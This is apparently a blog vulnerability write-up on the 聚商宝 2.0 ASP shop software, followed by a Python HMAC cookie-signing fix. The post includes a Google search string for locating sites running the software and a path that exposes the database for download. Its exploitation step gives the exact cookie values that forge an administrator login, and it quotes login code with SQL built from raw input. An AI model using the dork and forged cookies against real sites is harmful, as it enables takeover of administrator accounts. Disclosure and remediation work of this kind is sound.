FROM www.st999.cn/blog BY 久久久电脑
Program: 聚商宝2.0
Google keyword: intext:技术支持:奔明科技 聚商宝
A few days ago I came across a program called 聚商宝, downloaded its source code, and only today had time to take a brief look at it...
Vulnerabilities: database path disclosure (暴库) and back-end cookie spoofing
1) Requesting conn/conn.asp directly discloses the database path; download the database, decrypt it, and log into the back end.
2) Cookie spoofing. Code fragment from check.asp in the admin folder:
dim uid,upwd
uid=Replace_Text(Request.Form("userid"))
upwd=md5(Replace_Text(Request.Form("password")),16)
Verifycode=Replace_Text(request.Form("verifycode"))
' Replace_Text(), md5(), Logerr() and getIP() are defined elsewhere in the program
if not isnumeric(Verifycode) then
    Call Logerr()
    Call ErroFy()
end if
if Cint(Verifycode)<>Session("SafeCode") then
    Call ErroFy()
else
    Set rs=server.createobject("adodb.recordset")
    sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
    rs.open sqltext,conn,1,1
    If Rs.Eof And Rs.Bof Then
        response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
        response.write"<TR>"
        response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
        response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确!</div></td></tr>"
        response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>"
        response.write"</tr>"
        response.write"</table>"
    else
        ' The whole login state is three plain cookies; nothing later signs or re-validates them
        Response.Cookies("globalecmaster")=rs("username")
        Response.Cookies("masterflag")=rs("flag")
        Response.Cookies("adminid")=rs("id")
        LastLogin=Date()
        LastLoginIP=getIP()
        sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
        conn.execute(sql)
        response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
        response.write"<TR>"
        response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
        response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证!<br><br>2秒后自动进入后台...</div></td></tr>"
        response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>"
        response.write"</tr>"
        response.write"</table>"
        %>
        <meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
        <%
    end if
    rs.close
    set rs=nothing
end if

' Error page shown when the captcha is missing or wrong
Sub ErroFy()
    response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
    response.write"<TR>"
    response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
    response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!</div></td></tr>"
    response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>"
    response.write"</tr>"
    response.write"</table>"
    Response.End()
End Sub
Exploitation: use the 啊D tool to open the back end directly, set the following cookies, then request admin/index.asp to log in.
globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1
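The root cause is that check.asp records a successful login in three plain cookies (globalecmaster, masterflag, adminid) that the back end then trusts as-is, so anyone can type them in by hand. As an added illustration of the fix, not code from 聚商宝 and written in Python rather than ASP, the following binds those three values to a server-side secret with an HMAC so a hand-edited cookie set is rejected; SECRET_KEY, the adminsig cookie name and the sample values are assumptions.

```python
import hashlib
import hmac
from urllib.parse import quote, unquote

# Constructed demo secret (assumption); a real deployment keeps this outside the web root.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"
# The three identity cookies check.asp sets after a successful login.
FIELDS = ("globalecmaster", "masterflag", "adminid")


def _payload(values):
    # Canonical, fixed-order serialisation of the three values that get signed.
    return "|".join(str(values[f]) for f in FIELDS).encode("utf-8")


def issue_cookies(username, flag, admin_id):
    """Values to set after password + captcha pass: the three fields plus an HMAC over them."""
    values = {"globalecmaster": username, "masterflag": flag, "adminid": admin_id}
    values["adminsig"] = hmac.new(SECRET_KEY, _payload(values), hashlib.sha256).hexdigest()
    return values


def to_cookie_header(cookies):
    """Serialise like a browser's Cookie: header (values URL-encoded, as ASP does)."""
    return "; ".join(f"{k}={quote(str(v), safe='')}" for k, v in cookies.items())


def parse_cookie_header(header):
    """Split a raw Cookie: header into name -> decoded value (last duplicate wins)."""
    out = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            out[name] = unquote(value)
    return out


def verify_admin(cookies):
    """True only if all identity cookies are present and the HMAC over them matches."""
    if any(f not in cookies for f in FIELDS) or "adminsig" not in cookies:
        return False
    sig = str(cookies["adminsig"])
    if not sig.isascii():            # compare_digest refuses non-ASCII str input
        return False
    expected = hmac.new(SECRET_KEY, _payload(cookies), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)   # constant-time comparison


if __name__ == "__main__":
    # Constructed hand-edited cookie set in the style of the post, with no signature.
    print(verify_admin(parse_cookie_header("globalecmaster=admin; masterflag=01%2C%2002; adminid=1")))
    legit = parse_cookie_header(to_cookie_header(issue_cookies("admin", "01, 02", 1)))
    print(verify_admin(legit))
```

Changing any one of the three signed values (for example bumping adminid) invalidates the signature, which is the property the original three unsigned cookies lack.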